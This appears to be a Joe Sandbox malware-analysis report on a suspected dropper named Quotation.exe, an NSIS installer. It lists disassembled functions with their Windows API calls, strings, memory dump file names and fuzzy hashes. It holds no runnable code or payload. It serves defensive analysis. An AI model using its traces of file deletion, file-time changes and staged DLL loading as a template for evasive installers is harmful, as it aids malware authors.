GlobalFree.KERNEL32(?), ref: 73C62A4A
GlobalFree.KERNEL32(?), ref: 73C62A50
GetModuleHandleW.KERNEL32(00000008), ref: 73C62B1A
LoadLibraryW.KERNEL32(00000008), ref: 73C62B2B
GetProcAddress.KERNEL32(?,?), ref: 73C62B82
lstrlenW.KERNEL32(00000808), ref: 73C62B9D

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 1042148487-0
Opcode ID: 27b04ae62ed280eb3b0557ead910998dbf45dc79cbb829e6595a2bd03879bef6
Instruction ID: cdd890db31508e7a8eeb44504a1a68a91414330e3841cd503b5c2a4143c4c23e
Opcode Fuzzy Hash: 27b04ae62ed280eb3b0557ead910998dbf45dc79cbb829e6595a2bd03879bef6
Instruction Fuzzy Hash: AE42BF72A0830ADFD315CF25C8D476AB7F5FB88311F054A2EE59ADA284EB70D5448B93

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,771B3420,?), ref: 0040666A
Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

DeleteFileW.KERNELBASE(?,?,00000000,771B3420,?), ref: 00406723
lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,771B3420,?), ref: 00406775
lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,771B3420,?), ref: 00406796
lstrlenW.KERNEL32(?), ref: 00406799
FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
FindClose.KERNEL32(00000000), ref: 00406853

Strings

\*.*, xrefs: 0040676B

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
String ID: \*.*
API String ID: 2636146433-1173974218
Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004031B6
GetTickCount.KERNEL32 ref: 00403248
MulDiv.KERNEL32(?,?,?), ref: 00403278
wsprintfW.USER32 ref: 00403289

Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Strings

... %d%%, xrefs: 00403283
<Py, xrefs: 0040321B

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CountTick$FilePointerwsprintf
String ID: ... %d%%$<Py
API String ID: 999035486-2352372732
Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

Function 004065AD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
ShowWindow.USER32(?), ref: 00404FD9
GetWindowLongW.USER32(?,?), ref: 00404FEA
ShowWindow.USER32(?,?), ref: 00405006
GetDlgItem.USER32(?,00000001), ref: 0040512D
GetDlgItem.USER32(?,00000002), ref: 00405137
SetClassLongW.USER32(?,000000F2,?), ref: 00405151
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
GetDlgItem.USER32(?,00000003), ref: 0040524E
ShowWindow.USER32(00000000,?), ref: 00405277
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
EnableWindow.USER32(?), ref: 004052B7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
EnableMenuItem.USER32(00000000), ref: 004052D5
SendMessageW.USER32(?,?,00000000,00000001), ref: 004052E6
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
lstrlenW.KERNEL32(Eget Setup: Installing,?,Eget Setup: Installing,00000000), ref: 0040532E

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 0040604E

SetWindowTextW.USER32(?,Eget Setup: Installing), ref: 00405346

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

DestroyWindow.USER32(?,00000000), ref: 0040538E
CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2

Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512

GetDlgItem.USER32(?,000003FA), ref: 004053EB
GetWindowRect.USER32(00000000), ref: 004053F2
ScreenToClient.USER32(?,?), ref: 004053FE
SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
ShowWindow.USER32(?,?,00000000), ref: 00405436

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

ShowWindow.USER32(?,0000000A), ref: 0040547C

Strings

Eget Setup: Installing, xrefs: 0040531C, 00405329, 00405340

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
String ID: Eget Setup: Installing
API String ID: 162979904-3699597151
Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

Function 00405A1C Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 225
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE

lstrcatW.KERNEL32(1033,Eget Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Eget Setup: Installing,00000000,00000002,00000000,771B3420,00000000,771B3170), ref: 00405A9F
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Eget Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Eget Setup: Installing,00000000,00000002,00000000), ref: 00405B23
lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Eget Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Eget Setup: Installing,00000000), ref: 00405B38
GetFileAttributesW.KERNEL32(Call), ref: 00405B43
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\overlays\besvangredes), ref: 00405B8C

Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A

RegisterClassW.USER32(007A74E0), ref: 00405BD1
SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00405BE8
CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
ShowWindow.USER32(00000005,00000000), ref: 00405C4F
GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
RegisterClassW.USER32(007A74E0), ref: 00405C94
DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF

Strings

1033, xrefs: 00405A3F, 00405A63, 00405A9A
C:\Users\user\overlays\besvangredes, xrefs: 00405AAE, 00405AC0, 00405B5F, 00405B65, 00405B75
Eget Setup: Installing, xrefs: 00405A4F, 00405A5A, 00405A7A, 00405A84, 00405A99
RichEd32, xrefs: 00405C63
RichEdit, xrefs: 00405C81
.exe, xrefs: 00405B32
RichEdit20W, xrefs: 00405C74, 00405C8A
tz, xrefs: 00405B94
RichEd20, xrefs: 00405C55
_Nb, xrefs: 00405BB0, 00405C17
Control Panel\Desktop\ResourceLocale, xrefs: 00405A5C
Call, xrefs: 00405AE4, 00405AED, 00405AFE, 00405B52, 00405B58
.DEFAULT\Control Panel\International, xrefs: 00405A8A

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\overlays\besvangredes$Call$Control Panel\Desktop\ResourceLocale$Eget Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$tz
API String ID: 1975747703-2171652948
Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441
stringtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 004015F1
Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
SetForegroundWindow.USER32 ref: 00401634
ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
SetFileAttributesW.KERNELBASE(00000000,?,?,?,?,00000000,00000000), ref: 004016FB
GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 0040176A
SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\overlays\besvangredes,00000000,000000E6,C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,00000000,?,?,?,00000000,00000000), ref: 004017A3
MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\overlays\besvangredes,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\overlays\besvangredes,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82

Strings

C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp, xrefs: 00401998, 004019BB
C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll, xrefs: 00401789, 004017F8, 00401823, 004019B1, 004019D2
Call, xrefs: 004018FC, 00401906, 00401913, 00401925, 00401933, 00401968, 0040197C, 004019A2, 004019EA, 00401A7A, 00401A81, 00401A8B, 00401A96
C:\Users\user\overlays\besvangredes, xrefs: 00401798, 0040190E

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
String ID: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp$C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll$C:\Users\user\overlays\besvangredes$Call
API String ID: 3895412863-3603872608
Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

Function 004033CB Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033DE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00403444
GlobalAlloc.KERNELBASE(?,?), ref: 0040359E

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033D1
Error launching installer, xrefs: 0040341A
Null, xrefs: 004034CC
C:\Users\user\Desktop\Quotation.exe, xrefs: 004033E9, 004033F3, 00403407, 00403424
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361E
Inst, xrefs: 004034B8
C:\Users\user\Desktop, xrefs: 00403425, 0040342A, 00403430
soft, xrefs: 004034C2

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-543339705
Opcode ID: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction ID: 8295773d5102a3db2c924d587f32f5b95c2827ef7f93a52122a4f4d2b553c90e
Opcode Fuzzy Hash: 89db09ba3d9e86f9c075612005f46009679623d63feb2a5cce1b372a96914bed
Instruction Fuzzy Hash: B951D371904300AFD720AF25DD81B1B7AA8BB8471AF10453FF955B62E1CB3D8E548B6E

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DBC

GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 00405FD5
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 0040604E
lstrlenW.KERNEL32(Call,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 004060A8

Strings

Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll, xrefs: 00405EF3
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F8D
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406048
